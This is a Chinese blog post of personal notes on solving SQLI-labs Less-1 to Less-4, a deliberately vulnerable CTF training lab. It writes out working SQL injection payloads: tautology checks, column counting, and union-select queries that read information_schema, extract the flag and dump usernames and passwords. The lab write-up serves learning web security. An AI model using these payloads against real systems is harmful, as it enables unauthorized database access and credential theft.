SQLI-labs 个人心得

最新推荐文章于 2024-04-28 16:28:02 发布
最新推荐文章于 2024-04-28 16:28:02 发布
阅读量545 收藏 3
点赞数 3
分类专栏: SQLI-labs 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48175067/article/details/109607539
版权

SQLI-labs 个人心得

前言

​ 本人在写CTF中SQLI-labs的例题时,刚开始一点思路也没有,很茫然,感觉无处下手,于是我就百度了一下,再加之在B站找了个视频看了看,通过视频与一些博客,总算是有了一点思路,本片博客主要是针对于本人自己学习中的一些心得进行总结,用于自用。

在做题时参考了这篇文章

https://blog.csdn.net/qq_41429081/article/details/101167892

SQLI-labs-less-1

​ 刚开始先在URL中对于ID进行更改。

在这里插入图片描述

寻找注入点

构造payload

http://48cbd059-c54c-48fe-b4ec-2b1ea12aebab.node3.buuoj.cn/Less-1/?id=1'or '1'='1

页面显示正常

在这里插入图片描述

payload

http://48cbd059-c54c-48fe-b4ec-2b1ea12aebab.node3.buuoj.cn/Less-1/?id=1'and '1'='2

页面无数据

在这里插入图片描述

所以此处存在SQL注入漏洞

开始注入

因为前面测得具有回显,所以采取union联合查询

1.查找列数
http://48cbd059-c54c-48fe-b4ec-2b1ea12aebab.node3.buuoj.cn/Less-1/?id=1' order by 3 --+

–+主要用于注释掉SQL语句后面的内容,该题所查出的列数为3列。

2.查询数据库
http://48cbd059-c54c-48fe-b4ec-2b1ea12aebab.node3.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)'

结果如下:

在这里插入图片描述

id传入一个数据库中没有的值即可,因为如果是数据库中存在的值,即会返回多条记录,会显示前一个找到的值,而我们想要的将无法显示。同时使用GROUP_CONCAT将查询到的数据库名拼接显示

3.查表中字段
http://a34dda74-400a-49ee-b839-d7e83a46b079.node3.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag')'

结果如下:

在这里插入图片描述

4.查数据取得FALG
http://a34dda74-400a-49ee-b839-d7e83a46b079.node3.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag)'

结果如下:

在这里插入图片描述

取到了FLAG!

SQLI-labs-less-2-4

其实在做完了前四道题之后我发现,前四道题都是同一个套路,只需要走一遍流程就可以了,没有太大的区别!

主要就是先用ID=1来进行判断数据是否显示,然后通过or或者and式子判断是否有SQL注入漏洞,然后开始联合查询就可。

只不过依次检测是单引号闭合或者是双引号或者括号的闭合问题!

四个查询语句

1.查库:select schema_name from information_schema.schemata
2.查表:select table_name from information_schema.tables where table_schema='security'
3.查列:select column_name from information_schema.columns where table_name='users'
4.查字段:select username,password from security.user

烦躁的程序员
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs个人注入心得
hecker_chicken的博客
02-02 434
#sqli-labs个人注入心得 闭合方式类型都有一般是’,",或 无闭合符号 或 '),") Less-1 尝试?id=1 注释符号为–+、-- 、#。 当尝试?id=1’)时 很明显是属于单引号闭合方式 用–+注释掉后面的 接下来就要判断一下列数?id=1’ order by 10–+,发现 多试验几次后 得到共有三列数据接着进行联合查询?id=X’(x不等于1,2,3) union sele...
sqli-labs心得
rescure的博客
01-21 272
在此只声明一些用法,详细的请看大佬博客 联合注入 select1,(select datatbase()),3 select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’),3 报错盲注 1.floor select 1,count(*),concat((...
sql-labs 靶场环境搭建(半保姆级)
最新发布
W96314780的博客
04-28 751
在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。这里借用大佬的一些文献。压缩完成后,直接打开sqli-labs-master在里面中找到sqli-connections并以记事本的方式打开db-creds.inc。确认后,可以用默认浏览器打开“http://127.0.0.1/sqli-labs-master/”访问首页。每一个企鹅都是习,通过靶场习更好的认识SQL注入漏洞,和SQL注入危害。
学习完sqli-labs总结
weixin_38116282的博客
09-29 506
sqli-labs全部过了一遍 这里总结下这段时间学习到的东西 然后转战下sql脚本和sqlmap源码 简单注入: 单引号 双引号 and or 1=1 1=2   a() POST注入: agent cookie referrer注入                    注释注入 # --+ 盲注:判断 ascii(substr((select database())
sqli-labs
qq_51110485的博客
07-16 1027
sqli-labsLess-1Less-2Less-3Less-4Less-5Less-6 Less-1 进入关卡内,先判断是否存在注入情况 先输入?id =1 and 1=1,发现没有变化,换成?id=1 and 1=2,依旧没有变化,考虑是为字符型而非整形。 用?id=1'进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入 发现为字符型的后先在后面加一个注释符 --+,可以正常输出 单行注释: 1.使用#注释符,#注释符后直接加注释内容 2.使用–注释符,–注释符后需要加一个空格,注释才能
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 729
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
sqli-labs个人习 通关总结
Tajang的大千世界
07-10 718
这个系列是我在sqli-labs中SQL注入的解题过程。 随缘更新 less-1 打开关卡 根据提示得知我们应该传入id值,先?id=1'测试一下 报错,把单引号去掉试试 成功返回数据,再测试?id=2 返回数据,再尝试一下?id=2-1 仍然显示id=2的数据,排除数字型注入,大概是字符型注入了,尝试封闭单引号并且注释后面的语句 猜解字段数,?id=1' order by 1,2,3 --+ 没有报错,测试是否有4个字段?id=1' order by 1,2,3,4 --+ 报错,说明
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs大详解
gankjk的博客
10-19 6588
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先输入参数?id=1,这时页面正常显示,并不报错。 这时我们输入?id=1‘时出现报错,可以判断它是单引号注入 常规注入,判断字段数,当我们order by10时,发生错误,然后我们用二分法判断有几个字段(向上取整)。 当我们到order by 3 时没有报错,这时候我们试试order by 4,发现报错,说明只有三个字段。 然后我们看回显...
sqli-labs详细全解31-40
qq_38415434的博客
01-11 933
sqli-labs详细全解31-40 第三十一关: login.php 只对第一个参数进行了检测,而第二个参数并没有进行过滤。 payload:id=2&id=1") and 1=12-- - 第三十二关: f
openstack实训总结心得_我的大一总结
weixin_39816362的博客
12-10 4615
图片不太清楚 这里附上[链接](https://pan.baidu.com/s/1hK9qfGkLa-xjGFPTNipiow)密码: w98fUDLD (老师总结)大一内容总结1. 编程语言初级使用 C,java (python 未完成)2. Linux命令 基础命令(基本完成) 进程和线程 内存管理 TCP,UDP协议 未完成3.算法 完成 排序 最长递增 ...
学习web安全之搭建sqli-labs靶场
qq_51919093的博客
06-10 2047
Sqli-labs 也是一个专业的 SQL 注入习平台,它适用于 GET 和 POST 等多场景的注入。
sqli-labs靶场总结(持续更新)
<XiaoHai>的博客
06-17 1731
web安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值